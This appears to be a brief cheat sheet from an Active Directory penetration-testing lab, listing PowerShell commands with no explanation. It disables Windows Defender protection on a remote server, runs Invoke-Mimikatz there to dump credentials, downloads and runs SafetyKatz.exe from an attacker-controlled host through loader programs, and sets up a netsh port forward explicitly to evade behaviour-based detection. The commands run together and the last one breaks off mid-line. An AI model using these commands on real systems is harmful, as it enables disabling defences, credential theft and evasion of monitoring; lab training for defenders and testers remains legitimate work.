Tips And Tricks
Tips and Tricks
$sess = New-PSSession -ComputerName devsrv.dollarcorp.moneycorp.localInvoke-command -ScriptBlock{Set-MpPreference -DisableIOAVProtection $true} -Session $sess then from student145 machine, Import-Module .\Invoke-Mimikatz.ps1Invoke-command -ScriptBlock ${function:Invoke-Mimikatz} -Session $sessC:\Users\Public\Loader.exe -path http://192.168.100.X/SafetyKatz.exeC:\Users\Public\AssemblyLoad.exe http://192.168.100.X/Loader.exe -path http://192.168.100.X/SafetyKatz.exePort forward to bypass behaviour based detection
$null | winrs -r:dcorp-mgmt "netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.1Last updated